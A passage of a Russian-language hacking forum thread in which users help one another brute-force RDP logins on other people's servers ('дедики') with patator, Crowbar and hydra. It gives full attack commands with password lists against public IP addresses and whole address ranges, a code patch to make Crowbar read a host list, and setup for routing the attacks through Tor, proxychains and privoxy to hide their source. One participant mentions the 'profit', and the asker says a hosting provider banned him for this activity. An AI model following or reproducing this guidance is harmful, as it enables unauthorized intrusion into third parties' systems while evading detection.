• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Проблема Patator, тем кто разбирается в нём - вам сюда )

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Осваиваю "patator", застрял на таком шаге, выдаёт вот такой вот текст:

" | 43 | [18:38:15:532] [5326:5328] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr\n[18:38:15:532] [5326:5328] [INFO][com.freerdp.client.x11] - Authentication only. Don't connect to X.\n[18:38:17:028] [5326:5328] [ERROR][com.freerdp.core] - freerdp_set_last_error ERRCONNECT_AUTHENTICATION_FAILED [0x00020009]\n[18:38:17:029] [5326:5328] [ERROR][com.freerdp.core.transport] - BIO_read returned an error: error:14094419:SSL routines:ssl3_read_bytes:tlsv1 alert access denied\n[18:38:17:029] [5326:5328] [ERROR][com.freerdp.core] - Authentication only, exit status 1
^C18:38:18 patator INFO - 131 649 1.963 | 123456:admin:54.204.75.172 "

Вижу тут кучу всяких ошибок, что делать не знаю, гуглил. Знающие помогите плиз )

Вводил вот такие команды: "proxychains4 ./patator.py rdp_login host=FILE2 user=FILE1 password=FILE0 0=/root/Hydra/password.txt 2=/root/Hydra/resultrdp.txt 1=/root/Hydra/login.txt -x ignore:code=0"

И ещё вопрос, от того что я указываю в начале "proxychains4", будет ли от этого "patator" работать через прокси, если нет, то как сделать что бы он через них работал? Через тор например. На эту тему тоже гуглил и не нашёл.
 
V

Valkiria

" | 43 | [18:38:15:532] [5326:5328] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr\n[18:38:15:532] [5326:5328] [INFO][com.freerdp.client.x11] - Authentication only. Don't connect to X.\n[18:38:17:028] [5326:5328] [ERROR][com.freerdp.core] - freerdp_set_last_error ERRCONNECT_AUTHENTICATION_FAILED [0x00020009]\n[18:38:17:029] [5326:5328] [ERROR][com.freerdp.core.transport] - BIO_read returned an error: error:14094419:SSL routines:ssl3_read_bytes:tlsv1 alert access denied\n[18:38:17:029] [5326:5328] [ERROR][com.freerdp.core] - Authentication only, exit status 1
^C18:38:18 patator INFO - 131 649 1.963 | 123456:admin:54.204.75.172 "
Установил ли ты все зависимости пататора ?
Код:
Установка всех зависимостей Patator
yum update
yum -y install default-jre libldap-2.4-2 python python-crypto python-dns python-impacket python-ipy python-mysqldb python-paramiko python-psycopg2 python-pyasn1 python-pycurl python-pysnmp4 unzip freerdp2-x11 libsqlite3-dev libsqlcipher-dev ike-scan freerdp2-x11 curl
sudo pip install pysqlcipher ajpy
sudo python -m pip install cx_Oracle --upgrade

Зависимости Patator для модулей
yum -y install python-pycurl curl
yum -y install freerdp

python patator.py <module> -h
python patator.py rdp_login -h



git clone lanjelot/patator
chmod +x patator.py
cd patator
python patator.py

Информация об использовании:
python patator.py module --help
python patator.py rdp_login -h


У тебя установлена программа xfreerdp ?
Пробовал ли ты коннектиться с её помощью к какому-то удалённому компьютеру, то есть нужно выяснить, корректно ли установлен freeRDP ?
Код:
Если вы хотите установить зависимость только для определённых модулей,
то ниже дана информация о пакетах, которые вам нужно установить для того или иного модуля:
RDP (NLA)
# yum -y  install freerdp
проверка работоспособности xfreerdp
# xfreerdp --version
# xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 --sec rdp --plugin cliprdr 185.154.13.84
Ошибка может появиться из-за того, что брутишь с использованием proxychains4 (через прокси или тор).
Возможно, нужно увеличить тайм=аут перебора паролей.

" .proxychains4 /patator.py rdp_login host=FILE2 user=FILE1 password=FILE0 0=/root/Hydra/password.txt 2=/root/Hydra/resultrdp.txt 1=/root/Hydra/login.txt -x ignore:code=0"
Брутить дедики через прокси - идея "так себе" ))
Теоретически, твоя команда должна работать. Но на практике я никогда не брутила дедики через ТОР или прокси (сокс).

А вообще говоря, лучше всего брутить дедики в ОС Windows - профит больше.
 
Последнее редактирование модератором:

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Установил ли ты все зависимости пататора ?
на сколько я понимаю да, установил, так как делал по этой статье , если инфа тут актуальная, тогда проблема не в этом
У тебя установлена программа xfreerdp ?
Пробовал ли ты коннектиться с её помощью к какому-то удалённому компьютеру, то есть нужно выяснить, корректно ли установлен freeRDP ?
вот этой программы я не устанавливал, если по умолчанию в kali её нет, значит и у меня нет. Щас пойду посмотрю, если что то установлю.
Ошибка может появиться из-за того, что брутишь с использованием proxychains4 (через прокси или тор).
Возможно, нужно увеличить тайм=аут перебора паролей.
Я proxychains4 пробовал убирать, всё тоже самое повторяется.
Кстате, вот если у меня весь kali настроен на работу через тор, то patator по умолчанию тоже будет работать через него?
Брутить дедики через прокси - идея "так себе" ))
Теоретически, твоя команда должна работать. Но на практике я никогда не брутила дедики через ТОР или прокси (сокс).

А вообще говоря, лучше всего брутить дедики в ОС Windows - профит больше.
Я бы так и сделал, но у меня сейчас на руках нету дедиков, как только появятся, так сразу же так и начну делать... Был у меня не давно покупной удалённый рабочий стол, купил в легальной компании, так там меня заблокировали за подобную деятельность...

Ладно, пойду устанавливать xfreerdp...

По моему "xfreerdp" у меня установлен, так как он на команду "xfreerdp -h" реагирует выдачей справки
 

centr

Green Team
31.01.2017
408
475
BIT
0
В качестве альтернативы можно использовать Crowbar, с RDP работает и через tor работает.
 
V

Valkiria

программы xfreerdp я не устанавливал, если по умолчанию в kali её нет, значит и у меня нет. Щас пойду посмотрю, если что то установлю.
Её наличие обязательно для брутфорса в линукс ))
Ведь patator использует её при переборе паролей ))
Как и hydra, как и medusa, как и Crowbar , ncrack"...
После установки попробуй проверить xfreerdp - подключись к удалённому компу по протоколу RDP.
Если коннект прошёл удачно, то можно приступать к брутфорсу patator-ом.
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
В качестве альтернативы можно использовать Crowbar, с RDP работает и через tor работает.
В общем дело обстоит так, сначала я пытался брутить с помощью "Hydra" понял что скрость работы меня вообще не устраивает, сегодня начал искать замену побыстрее, и многие рекомендуют "Patator" с ним пока у меня дела ещё хуже... Так вот, к чему я это пишу - как скорость у "Crowbar, ncrack" выдают ли они не верный брут так же как "Medusa"?
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Её наличие обязательно для брутфорса в линукс ))
Ведь patator использует её при переборе паролей ))
Как и hydra, как и medusa, как и Crowbar , ncrack"...
После установки попробуй проверить xfreerdp - подключись к удалённому компу по протоколу RDP.
Если коннект прошёл удачно, то можно приступать к брутфорсу patator-ом.
А если брут с "Hydra" работал нормально, значит у меня всё впорядке с "xfreerdp"? Просто для того что бы сделать всё то что ты сказала, мне надо тратить время и всё это гуглить, так как я в линуксе неделю )
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Так же есть такая информация, когда я в конце своих команд дописываю "-x ignore:fgrep='exit status 1'" по рекомендациям одного из пользователей этого форума, то у меня вообще не чего не происходит, вначеле пишет что стартануло и всё такое и потом всё останавливается... А эта команда "-x ignore:fgrep='exit status 1'" убирает ошибки, короче у меня одни ошибки )
 
V

Valkiria

как скорость у "Crowbar, ncrack" выдают ли они не верный брут так же как "Medusa"?
Все скрипты, написанные для ОС Linux работают неудовлетворительно: постоянно вылетают какие-то ошибки в работе либо пропускаются "good-ы".
В Windows ситуация получше, но от пропуска "good-ов" там также никто не застрахован.
Но там работа намного комфортнее - жми себе на кнопочки и голову не забивай всякими вопросами типа "почему не работает ?" и поиском ответов на них))
Идеально работающей программы для брута дедиков не существует.
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Все скрипты, написанные для ОС Linux работают неудовлетворительно: постоянно вылетают какие-то ошибки в работе либо пропускаются "good-ы".
В Windows ситуация получше, но от пропуска "good-ов" там также никто не застрахован.
Но там работа намного комфортнее - жми себе на кнопочки и голову не забивай всякими вопросами типа "почему не работает ?" и поиском ответов на них))
Идеально работающей программы для брута дедиков не существует.
Ну а из того что тут обсуждается, что является лучшим (учитывая все минусы)?
И какая есть бесплатная программа для виндовс, которую можно пустить через тор?
 
V

Valkiria

Ну а из того что тут обсуждается, что является лучшим (учитывая все минусы)?
Мне кажется, Crowbar.
Код:
Crowbar — это инструмент для брут-форса, который может использоваться во время тестов на проникновение.
Обновляем систему Kali Linux до последней версии
# sudo apt update && sudo apt full-upgrade -y
Удаление неиспользуемых программ и ядер Kali Linux
# sudo apt autoremove -y
Очистка кэша пакетов в Kali Linux
# sudo apt autoclean -y
# sudo apt clean -y



# apt-get update
# apt-get install freerdp-x11
проверка работоспособности xfreerdp
# xfreerdp --version
# xfreerdp --sec nla 185.154.13.84


# apt-get install openvpn freerdp-x11 vncviewer
# git clone https://github.com/galkan/crowbar
Файлу надо добавить бит исполнимости:
# chmod +x crowbar.py

Пробуем запустить "Хелп"
# python crowbar.py --help
No module named pkg_resources

Решение проблемы с ошибкой No module named pkg_resources
# yum -y update
# yum -y install python-pip
# pip install --upgrade pip
1. Проблема с setup tools
# pip install --upgrade setuptools
# pip install --upgrade distribute


Опять пробуем запустить "Хелп"
# python crowbar.py --help
Работает ))

Запуск скрипта питон в скрипте баш
# python crowbar.py -b rdp -U login.txt -C pass.txt  -s 185.154.13.84/32 -o good.txt -n 100 -t 500 -v -d



Запуск скрипта питон в скрипте баш
Сканирование одной машины 185.154.13.84/32
# python crowbar.py -b rdp -U login.txt -C pass.txt  -s 185.154.13.84/32 -o good.txt -n 100 -t 500 -v -d
Сканирование сети 185.154.13.84/24
# python crowbar.py -b rdp -U login.txt -C pass.txt  -s 185.154.13.84/24 -o good.txt -n 100 -t 500 -v -d


# xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 --sec rdp --plugin cliprdr 185.154.13.84

Вот в этой теме обсуждался брут дедиков этим скриптом.
Обзор скрипта для брутфорса Crowbar в KaliLinux.
Вот видео:



Кстати, вот видео атаки брутфорсом при помощи Гидры.

Брут дедиков в Linux | ProxyChains-NG + Masscan + Hydra | Брут SSH-тоннелей | Брутфорс RDP
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Мне кажется, Crowbar.
В "Crowbar" есть проблемка, по крайней мере я с ней столкнулся. Указывая файл со списком хостов, например " -S /root/директория/хосты.тхт", "Crowbar" не видет этот файл... данные в файле заполнены так:
54.213.250.103
54.201.138.203
54.238.159.255
54.219.160.225
54.218.251.249
...много много строчек....

Но если например указывать хосты например так "-s 54.238.159.0/24" то всё работает.
В чём проблема? Быть может я в файле не в том формате указал ip?
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
0.0.0.0.0/32 будет правильней
спасибо, в этом уже разобрался, но всё равно, если указываю путь до файла, в котором написаны адреса например так:
0.0.0.0/32
0.0.0.0/32
0.0.0.0/32
...

или так:
0.0.0.0/32,
0.0.0.0/32,
0.0.0.0/32,
...

или так:
0.0.0.0/32 0.0.0.0/32 0.0.0.0/32 ...

или так:
0.0.0.0/32, 0.0.0.0/32, 0.0.0.0/32, ...

То всё равно "Crowbar" отказывается работать с таким текстовым документом, даже если там будет только один адрес, например - "0.0.0.0/32"
 

centr

Green Team
31.01.2017
408
475
BIT
0
файл 'crowbar/lib/main.py'
Строка 150
Код:
for _ in open(self.args.server_file, "r"):

меняем на
Код:
for _ in open(self.args.server_file, "r").read().splitlines():

запускаем и улыбаемся!

Автор видать с красноглазием переборщил, у самого такое было не раз.
 
  • Нравится
Реакции: u7u

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
файл 'crowbar/lib/main.py'
Строка 150
Код:
for _ in open(self.args.server_file, "r"):

меняем на
Код:
for _ in open(self.args.server_file, "r").read().splitlines():

запускаем и улыбаемся!

Автор видать с красноглазием переборщил, у самого такое было не раз.

Я уже думал что поможет, заранее улыбаться начал, но увы )
Выдаёт "Invalid IP Address! Please use IP/CIDR notation <192.168.37.37/32, 192.168.1.0/24>" хотя в текстовой документ для проверке я указал только один ip в формате "54.238.159.255/32"
да же "rebоot" делал

"Пример:
./patator.py http_fuzz url=' ' proxy=FILE0 0=/root/proxy.txt proxy_type=socks5

где FILE0 - файл с прокси формата host : port
socks5- указывайте тип прокси, который вы используете"

Это значит для того что бы через тор пустить, надо в этом файле написать "127.0.0.1:9050", и всё, тогда через тор будет работать?
 
Последнее редактирование:

centr

Green Team
31.01.2017
408
475
BIT
0
Я уже думал что поможет, заранее улыбаться начал, но увы )
Выдаёт "Invalid IP Address! Please use IP/CIDR notation <192.168.37.37/32, 192.168.1.0/24>" хотя в текстовой документ для проверке я указал только один ip в формате "54.238.159.255/32"
да же "rebоot" делал
С какими параметрами ты запускаешь crowbar?
reboot делать вообще ни к чему, ты правишь только скрипт самого crowbar который к системе ни какого отношения не имеет!
Положи все словари в корень (директория root) и запусти с такими параметрами:
Код:
python crowbar.py -b rdp -S /root/servers.txt -U /root/logins.txt -C /root/passwords.txt
 

Raskolnikov

Green Team
30.07.2017
67
21
BIT
0
Я уже думал что поможет, заранее улыбаться начал, но увы )
Выдаёт "Invalid IP Address! Please use IP/CIDR notation <192.168.37.37/32, 192.168.1.0/24>" хотя в текстовой документ для проверке я указал только один ip в формате "54.238.159.255/32"
да же "rebоot" делал


"Пример:
./patator.py http_fuzz url=' ' proxy=FILE0 0=/root/proxy.txt proxy_type=socks5

где FILE0 - файл с прокси формата host : port
socks5- указывайте тип прокси, который вы используете"

Это значит для того что бы через тор пустить, надо в этом файле написать "127.0.0.1:9050", и всё, тогда через тор будет работать?
Да, только там предварительная настройка нужна. Но этот способ лучше использовать для брута с использованием прокси листа.

Если вам нужен только тор, то можно использовать privoxy

Как весь трафик в Kali Linux пропускать через Tor (настройка Tor и Privoxy в Kali Linux 2.0)

После настройки privoxy, можно использовать так

Patator proxy=127.0.0.1:9050 proxy_type=socks5
 
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!